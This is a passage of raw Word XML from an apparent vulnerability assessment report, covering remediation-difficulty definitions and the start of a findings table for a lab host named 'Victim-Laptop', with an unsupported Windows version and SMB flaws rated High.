            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A8E5339" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Minor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="511B81CE" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Successful exploitation may affect few users, without causing much disruption to routine business functions.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="274F9C58" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="585F9AF9" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C93206" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F90FBC7" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc229491299"/>
      <w:r>
        <w:t>Remediation Difficulty Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>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444C92" w14:paraId="469AF5C1" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0817D4D7" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="154D03E4" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="31ECD757" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41D2C23B" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Hard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4D723876" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Remediation may require extensive reconfiguration of underlying systems that is time consuming. Remediation may require disruption of normal business functions. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="5DB76C57" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="660E0197" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="425FE7A8" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Remediation may require minor reconfigurations or additions that may be time-intensive or expensive.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7446DDC9" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="5CC639EF" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="93C47D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60C43D6A" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6374F65B" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Remediation can be accomplished in a short amount of time, with little difficulty.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="191BDBA6" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BA95C5E" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_r2tozm8dlceh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B49541E" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc364109528"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ASSESSMENT FINDINGS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="145FA019" w14:textId="5F2C677B" w:rsidR="00E617E5" w:rsidRPr="00E617E5" w:rsidRDefault="00E617E5" w:rsidP="00E617E5">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7571">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Table 1 — Victim-Laptop Vulnerabilities (192.168.57.20)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a7"/>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3402"/>
        <w:gridCol w:w="993"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="3949"/>
      </w:tblGrid>
      <w:tr w:rsidR="00075FB2" w14:paraId="3595EB4F" w14:textId="3FC193AC" w:rsidTr="00831F32">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="772CF828" w14:textId="252675F0" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidR="00284A9E">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>o.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="13392114" w14:textId="72772335" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00075FB2">
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Vulnerability Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="11B6AA33" w14:textId="77777777" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Risk Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="27AC2744" w14:textId="77777777" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
          </w:tcPr>
          <w:p w14:paraId="004B095A" w14:textId="2256F1DD" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00075FB2" w14:paraId="18D19903" w14:textId="59B26955" w:rsidTr="00831F32">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5370F982" w14:textId="77777777" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3020D8D4" w14:textId="767A7397" w:rsidR="00075FB2" w:rsidRDefault="00E37F5B" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B830BC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>OS End-of-Life Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="772B065E" w14:textId="7689926D" w:rsidR="00075FB2" w:rsidRDefault="00B0491B" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48A03DAF" w14:textId="77777777" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
          </w:tcPr>
          <w:p w14:paraId="2C7FBF18" w14:textId="309C68A0" w:rsidR="00075FB2" w:rsidRPr="00357344" w:rsidRDefault="00357344" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00357344">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Windows version</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00357344">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is no longer supported by Microsoft, leaving it unpatched against emerging threats.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00075FB2" w14:paraId="1BA4E6AF" w14:textId="3BD2BC15" w:rsidTr="00831F32">
        <w:trPr>
          <w:trHeight w:val="453"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3BE7D318" w14:textId="77777777" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="479A12BD" w14:textId="7E012E50" w:rsidR="00075FB2" w:rsidRDefault="00E37F5B" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E37F5B">
              <w:t>Microsoft Windows SMB Server Multiple Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7CCDC063" w14:textId="30398577" w:rsidR="00075FB2" w:rsidRDefault="00B0491B" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7C5A8D19" w14:textId="77777777" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3949" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
          </w:tcPr>
          <w:p w14:paraId="1E864C98" w14:textId="75B8FC50" w:rsidR="00075FB2" w:rsidRDefault="00D5608F" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D5608F">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>SMB service is affected by multiple flaws which could allow remote code execution or privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00075FB2" w14:paraId="08F5F9EF" w14:textId="21352A54" w:rsidTr="00831F32">
        <w:trPr>
          <w:trHeight w:val="468"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20328D8F" w14:textId="77777777" w:rsidR="00075FB2" w:rsidRDefault="00075FB2" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4E6D7373" w14:textId="1048B1AA" w:rsidR="00075FB2" w:rsidRDefault="00170D8E" w:rsidP="008A21E0">
